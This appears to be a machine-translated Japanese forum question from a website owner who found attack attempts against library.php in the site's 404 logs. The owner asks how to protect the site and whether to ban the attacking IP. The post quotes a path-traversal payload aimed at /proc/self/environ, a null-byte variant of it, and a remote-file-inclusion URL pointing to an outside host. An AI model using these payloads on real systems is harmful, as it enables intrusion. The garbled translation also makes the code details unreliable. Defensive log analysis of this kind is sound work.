404ログを調べると、次の2つのURLに気付きました。どちらも1回発生しました。
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
そして
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
問題のページには、半ダースの異なる許容値をlibrary.php
持つtype
変数が必要id
です。次に変数が必要です。したがって、有効なURLは
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
IDはすべてmysql_real_escape_string
、データベースのクエリに使用される前にすべて実行されます。
私は新人ですが、これらのリンクの両方がwebrootに対する単純な攻撃であるように思えますか?
1) 404以外のこれらの種類の事柄から保護する最善の方法は?
2)責任のあるIPをパーマバンする必要がありますか?
編集:また、これに気づいた
/library.php=http://www.basfalt.no/scripts/danger.txt
編集2: 3つの攻撃すべての攻撃IPは216.97.231.15
、ロサンゼルスのすぐ外にあるLunar Pagesと呼ばれるISP に由来します。
編集3:金曜日の朝、現地時間にISPに電話して、電話で連絡できる人と問題について話し合うことにしました。ここに結果を24時間ほどで投稿します。
編集4:私は最終的に彼らの管理者にメールを送り、彼らは最初に「彼らはそれを探していた」と答え、1日後に「この問題は今すぐ解決されるべきだ」と答えた。悲しいことに、それ以上の詳細はありません。
type
(スルーも使用することが含まれるスクリプト指示しIF $_GET['type'] == 'thing') {} ESLE...
、しないような直接リンクとしてのinclude 'type.php'
)とid
mysql_real_escape_stringのとを介して実行され、そのクエリのために使用されます。それを知って、私はまだ安全ですか?